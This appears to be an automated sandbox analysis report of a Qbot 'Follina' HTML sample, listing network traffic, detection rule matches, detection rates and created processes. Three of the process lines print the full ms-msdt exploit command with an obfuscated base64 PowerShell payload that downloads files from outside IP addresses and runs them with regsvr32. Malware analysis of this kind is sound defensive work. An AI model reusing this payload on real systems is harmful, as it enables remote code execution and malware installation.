Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NXQXXLFST89&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165633Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRFHVFW&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165634Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NCBCSZSJRSB&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165635Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NMPJ99VJBWV&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165635Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9NBLGGH5FV99&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165636Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/opportunity?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&itemId=9WZDNCRDFNG7&skuId=0010&installKind=Install&ctid=store-curated-postoobe&bSrc=i.t&asid=bb4e26aa6fae45b5bae03115aaadb587&time=20220608T165636Z HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=6F71D7A7.HotspotShieldFreeVPN_nsbqstbb9qxb6&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: 5KCV/ucurkKWj1DM.0.2.4Host: displaycatalog.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?pg=PC000P0FR5.0000000IQ8&unid=&placementType=PostOOBE&app=&pid=425106554&cid=128000000001392709&tid=700342084&reqasid=db438b8e50164ff5b8bd81712c333d20&region=US&lang=EN-US&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.17134.1&mo=&cap=&auid=&anid=&muid=&persid=&bSrc=i.t&time=20220608T165639Z&asid=bb4e26aa6fae45b5bae03115aaadb587&eid= HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Disney.37853FC22B2CE_6rarf9sa4v8jt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: 9g8eTgIWfUaDjTKd.0.2.4Host: displaycatalog.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=BytedancePte.Ltd.TikTok_6yccndn6064se&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: zhqjwGqLmUuS/bSy.0.2.4Host: displaycatalog.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=AdobeSystemsIncorporated.AdobePhotoshopExpress_ynb6jyjzte8ga&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: RMJ1wyKXOUa74Ova.0.2.4Host: displaycatalog.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B9482F4B4-E343-43B6-B170-9A65BC822C77%7D/x64/10.0.17134.1/0?CH=17&L=en-US&P=&PT=0x30&WUA=10.0.17134.1&MK=V9ZhaY+AExEokuW&MD=nDwd7vN9 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.81Host: sls.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /v7.0/products/lookup?alternateId=PackageFamilyName&value=AmazonVideo.PrimeVideo_pwbj9vvecjh7j&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonUser-Agent: Install ServiceMS-CV: 6FnDaZKSh0SJLCOK.0.2.4Host: displaycatalog.mp.microsoft.com

Source: unknown	HTTPS traffic detected: 20.82.209.183:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.209.183:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.82.209.183:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.3:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.3:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.211.4.86:443 -> 192.168.2.3:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.138:443 -> 192.168.2.3:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.253.33.200:443 -> 192.168.2.3:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.253.33.200:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.40.136.238:443 -> 192.168.2.3:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.40.136.238:443 -> 192.168.2.3:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.40.136.238:443 -> 192.168.2.3:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.40.136.238:443 -> 192.168.2.3:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.3:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.3:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.3:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.3:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.3:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.112.88.60:443 -> 192.168.2.3:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.54.89.106:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.24.244:443 -> 192.168.2.3:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.24.244:443 -> 192.168.2.3:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.24.244:443 -> 192.168.2.3:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.24.244:443 -> 192.168.2.3:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.54.89.106:443 -> 192.168.2.3:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.54.89.106:443 -> 192.168.2.3:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.24.244:443 -> 192.168.2.3:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.24.244:443 -> 192.168.2.3:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.24.244:443 -> 192.168.2.3:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.54.89.106:443 -> 192.168.2.3:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.242.101.226:443 -> 192.168.2.3:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.24.244:443 -> 192.168.2.3:49862 version: TLS 1.2

Source: Qbotfollina.html, type: SAMPLE	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: 0000000A.00000002.700178209.00000287043D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 0000000A.00000002.699853549.000002870412E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 0000000A.00000002.699747541.0000028704110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: Process Memory Space: msdt.exe PID: 408, type: MEMORYSTR	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02

Source: Qbotfollina.html	Virustotal: Detection: 43%
Source: Qbotfollina.html	ReversingLabs: Detection: 31%

Source: C:\Windows\System32\msdt.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\Qbotfollina.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,9164953901427167469,2460945290142951251,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,9164953901427167469,2460945290142951251,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62A0D424-F78.pma

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\db6345c4-2474-41f9-a909-0f9135d23777.tmp

Jump to behavior

Source: classification engine

Classification label: mal56.expl.winHTML@33/138@2/6

Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next

Source: C:\Windows\System32\msdt.exe

File opened: C:\Windows\system32\MSFTEDIT.DLL

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\3960_1210988044\LICENSE.txt

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
